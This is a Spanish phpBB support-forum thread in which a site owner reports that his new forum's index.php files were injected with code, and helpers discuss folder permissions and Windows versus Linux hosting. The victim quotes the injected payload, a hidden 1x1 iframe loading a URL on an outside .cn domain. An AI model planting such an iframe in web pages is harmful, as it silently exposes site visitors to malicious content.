URL: http://piperrak.org/public/foro" onclick="window.open(this.href);return false;
Versión phpBB: phpBB3 (3.0.4)
MODs Instalados: Ninguno
Plantilla(s) usada(s): Black_Pearl
Servidor: Windows (de pago) - aruba.it
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No
Buenas maestros,
estoy muy preocupado ya que ayer mismo terminé de instalar y configurar mi flamante nuevo foro phpbb 3.0.4 y esta mañana cuando he ido a visitarlo el navegador decía algo así como que faltaba un ? de cierre en index.php!!!
Cuál ha sido mi sorpresa cuando he comprobado que me han inyectado código en estos dos archivos:
/index.php
/includes/hooks/index.php
El código que han inyectado es un frame de publicidad:
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Me preocupa muchísimo cómo lo han hecho. Me imagino que algo se me escapa o que quizá no haya terminado de cerrar los agujeros de seguridad. Los permisos de todas las carpetas del foro son 666 (¿Es correcto?)
Alguna idea de cómo lo han hecho?
Recordad que para pedir soporte alguno, debéis facilitar los datos de soporte oportunos por favor, mirad aquí y leer las Normas generales del foro, esto nos servirá de ayuda para dar el mejor soporte..
Gracias.
La Administración de phpBB España.
INYECCIÓN CÓDIGO EN INDEX.PHP
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
No es correcto CHMOD 666 para todas las carpetas, verifica los permisos CHMOD de archivos y carpetas, mira en el foro de guías.
S@lu2
S@lu2
Raul [ThE KuKa] en phpBB
Jr. Extension Validator - Jr. Styles Validator - Style Customisations - Translator - International Support Team
Si te gustan mis estilos, traducciones, etc. y quieres mostrar algo de aprecio, no dudes en hacer una donación 
phpBB España - En línea desde 2003 
-
gorka_arai
- Mensajes: 15
- Registrado: 13 May 2007, 12:23
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Gracias por tu respuesta Kuka. Ahora me encuentro con que no puedo cambiar los permisos de las carpetas... Y eso que mi foro está alojado dentro de la carpeta "Public" (que es una carpeta por defecto y se supone que debería poder cambiar los permisos a mi antojo no?)
-
gorka_arai
- Mensajes: 15
- Registrado: 13 May 2007, 12:23
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Esto es desesperante, en apenas unas horas alguien o algo está inyectando código en mis index.php (el código que inyecta es el del post de arriba). Cómo lo hace? Cómo debo protegerme? Y sobre todo: A qué se debe este problema? Es por colocar mi foro en la carpeta predeterminada del hosting "Public"?
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
Tu servidor es Windows, no puedes modificar los permisos de archivos y carpetas, eso lo debe hacer tu hosting.
Mira en el foro de guías de phpBB 3, contacta con Aruba y diles que permisos requiere cada carpeta y/o archivo.
S@lu2
Mira en el foro de guías de phpBB 3, contacta con Aruba y diles que permisos requiere cada carpeta y/o archivo.
S@lu2
Raul [ThE KuKa] en phpBB
Jr. Extension Validator - Jr. Styles Validator - Style Customisations - Translator - International Support Team
Si te gustan mis estilos, traducciones, etc. y quieres mostrar algo de aprecio, no dudes en hacer una donación
phpBB España - En línea desde 2003
Re: INYECCIÓN CÓDIGO EN INDEX.PHP
O mejor aún, diles que te pasen tu web a un servidor Linux. En aruba.it tienen el mismo precio que el hospedaje en servidores Windows, así que con suerte te lo moverán sin problemas. Entonces sí podrás dar permisos.
Der Mensch schuf Gott nach seinem eigenen Bild
Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!